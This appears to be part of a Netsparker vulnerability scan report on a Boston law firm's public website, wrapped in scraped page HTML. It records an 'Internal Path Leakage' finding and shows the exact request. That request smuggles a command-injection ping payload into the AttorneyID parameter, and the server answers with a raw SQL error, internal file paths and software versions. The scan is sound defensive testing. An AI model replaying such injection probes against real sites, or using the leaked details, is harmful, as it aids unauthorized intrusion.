href="http://www.nutter.com/publications_events.php?NewsID=1042" title="Jonathan Kotlier and Benjamin Mack publish �The SEC�s new cooperation initiative: Closer coordination with DOJ could have collateral upsides for defendants�">Jonathan Kotlier and Benjamin Mack publish �The SEC�s new cooperation initiative: Closer coordination with DOJ could have collateral upsides for defendants�<br /><em>Westlaw Journal White-Collar Crime</em></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=992" title="Jonathan Kotlier and Ian Roffman participate in the BBA�s program �Securities Fraud 2010: The �New Deal� at the SEC, Insider Trading, and a White Collar Trial�">Jonathan Kotlier and Ian Roffman participate in the BBA�s program �Securities Fraud 2010: The �New Deal� at the SEC, Insider Trading, and a White Collar Trial�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=819" title="Jonathan Kotlier and Ian Roffman participate in BBA program �Securities Fraud 2009: Madoff, Trials, and the SEC's View on Enforcement�">Jonathan Kotlier and Ian Roffman participate in BBA program �Securities Fraud 2009: Madoff, Trials, and the SEC's View on Enforcement�<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=742" title="Jonathan Kotlier and Ian Roffman present at ECOA 2008 Annual Business Ethics and Compliance Conference">Jonathan Kotlier and Ian Roffman present at ECOA 2008 Annual Business Ethics and Compliance Conference<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=678" title="Jonathan Kotlier appointed to Judicial Nominating Commission">Jonathan Kotlier appointed to Judicial Nominating Commission<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=655" title="Jonathan Kotlier and Ian Roffman host ECOA's webinar on personal liability for compliance professionals">Jonathan Kotlier and Ian Roffman host ECOA's webinar on personal liability for compliance professionals<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=644" title="Jonathan Kotlier moderated BBA seminar on SEC Practices and Investigations">Jonathan Kotlier moderated BBA seminar on SEC Practices and Investigations<br /></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=553" title="Jonathan Kotlier publishes article on options backdating investigations">Jonathan Kotlier publishes article on options backdating investigations<br /><em>New England In-House</em></a></li><li class="temp_articles"><a href="http://www.nutter.com/publications_events.php?NewsID=467" title="Jonathan Kotlier moderates BBA panel on options backdating investigations">Jonathan Kotlier moderates BBA panel on options backdating investigations<br /></a></li><li class="toggle"><span id="articleArrow"><img src="media/images/down_arrow.gif" width="6" height="6"></span> <a href="javascript:toggleDisplay('temp_articles','articleButton','articleArrow')"><span id="articleButton">More</span></a></li></ul></div><div id="NarrativeText"><p>Jonathan L. Kotlier is a partner in the Litigation Department and a member of the Government Investigations and White Collar Crime practice group. Jonathan joined the firm in 2004 from the U.S. Attorney&rsquo;s Office where, for eight of his twelve years, he was Chief of the Economic Crimes Unit. <br /></p><p>Since joining Nutter, Jonathan has represented several corporations and individuals in white collar criminal and complex civil cases and investigations involving alleged securities fraud, health care fraud, environmental crimes, government contracting fraud, and False Claims Act violations. Much of his work has been in the area of defending securities related actions involving accounting fraud issues. He has also conducted internal investigations on behalf of corporations and special litigation committees. He frequently represents individuals and corporations before the Securities and Exchange Commission. <br /></p><p>Recently, Jonathan won the dismissal of a securities fraud complaint against a bond underwriter, which was upheld by the First Circuit Court of Appeals. Some of his other recent representatio..
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /attorneys.php

/attorneys.php

http://www.nutter.com/attorneys.php?AttorneyID=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Identified Internal Path(s)

  • /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68
  • /usr/local/apache/htdocs/attorneys.php

Request

GET /attorneys.php?AttorneyID=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:09:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Transfer-Encoding: chunked
Content-Type: text/html


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"& ping -n 26 127.0.0.1 &' at line 1 | 1064<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=\"& ping -n 26 127.0.0.1 &<br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b><br /><!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Attorneys : Nutter McClennen & Fish LLP--> <title>Attorneys : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.209.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.226.gif" border="0" title="" alt=""></h2><span><img src="http://www.nutter.com/media/images/search_for_an.gif" alt="Search For An Attorney"/></span><div id="Alpha"><a href="http://www.nutter.com/attorneys.php?letter=A">A</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=B">B</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=C">C</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=D">D</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=E">E</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=F">F</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=G">G</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=H">H</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=I">I</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=J">J</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=K">K</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=L">L</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=M">M</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=N">N</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=O">O</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=P">P</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Q">Q</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=R">R</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=S">S</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=T">T</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=U">U</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=V">V</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=W">W</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=X">X</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Y">Y</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Z">Z</a></div><form method="post" action="http://www.nutter.com/attorneys.php"> <table cellpadding="0" cellspacing="0" id="Form"> <tr> <td><label for="FirstName">First Name</label></td> <td><input type="text" name="FirstName" value="" id="FirstName"/></td> <td><label for="LastName">Last Name</label></td> <td><input type="text" name="LastName" value="" id="LastName"/></td> <td></td> </tr> <tr> <td><label for="Keywords">Keywords</label></td> <td colspan="3"><input type="text" name="Keyword" value="" id="Keywords"/></td> <td><input type="image" src="/media/images/attorney_go_button.gif" name="Submit" id="Go"/></td> </tr> </table> <div id="subMenus"> <ul id="menuList"> <li> <a href="javascript:void(0)" title="Practice Area" id="Practice" class="subLinks">Practice Area</a> <ul class="subCategoriesScroll" onmouseover="colorItem('Practice', 'subHover')" onmouseout="colorItem('Practice', 'subLinks')"> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=2" title="Antitrust">Antitrust</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=3" title="Banking and Financial Services">Banking and Financial Services</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=5" title="Business/General Corporate">Business/General Corporate</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=6" title="Commercial Finance">Commercial Finance</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=7" title="Education">Education</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=8" title="Emerging Companies/High Technology">Emerging Companies/High Technology</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=37" title="Energy Law">Energy Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=10" title="Environmental Law">Environmental Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=11" title="Government Investigations and White Collar Defense">Government Investigations and White Collar Defense</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=13" title="Hedge Funds">Hedge Funds</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=15" title="Intellectual Property">Intellectual Property</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=16" title="IP Litigation">IP Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=9" title="Labor, Employment and Benefits">Labor, Employment and Benefits</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=17" title="Land Use, Permitting and Development">Land Use, Permitting and Development</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=19" title="Litigation">Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=34" title="Litigation: Data Security Breach and Privacy">Litigation: Data Security Breach and Privacy</a></li> <li><a href="http://www.nutter.c..